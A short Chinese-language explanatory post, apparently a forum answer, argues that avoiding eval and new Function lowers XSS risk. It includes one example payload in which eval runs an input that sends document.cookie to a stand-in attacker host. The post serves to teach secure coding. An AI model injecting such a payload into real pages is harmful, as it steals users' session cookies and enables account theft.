避免使用eval和new Function的确是降低XSS攻击的风险之一,注意是“之一”,不是全部方法,导致XSS攻击的漏洞很多,都需要堵。
XSS,也就是Cross Site Scripting,说到底就是网站存在漏洞,在浏览器端执行由用户决定的script内容,因为这样的script完全失控,所有可以是任何script,包括把用户的cookie发送给第三方网站(也就是坏人的网站)。
最简单直接的例子。
// 用户的输入可以操纵input的结果如下
input = 'new Image().src="http://badass.com/"+document.cookie';
// 代码中直接eval这个input
eval(input);这样就把用户的cookie泄露了,坏人可以利用这些cookie干坏事,比如盗取用户信息,甚至盗取用户的钱。
防止XSS攻击也就是要让网页不要执行任意用户输入的内容,eval和new Function这两种方式天生即使把一个字符串当script来执行,谁也说不准输入的字符串哪来的,也许经过了处理,也许没有,没处理过的字符串就可以让eval干任何事,为了安全着想,最好不要用,实际上,绝大部分使用eval和new Function的场合,都可以换成其他方式实现同样功能,所以,别用了。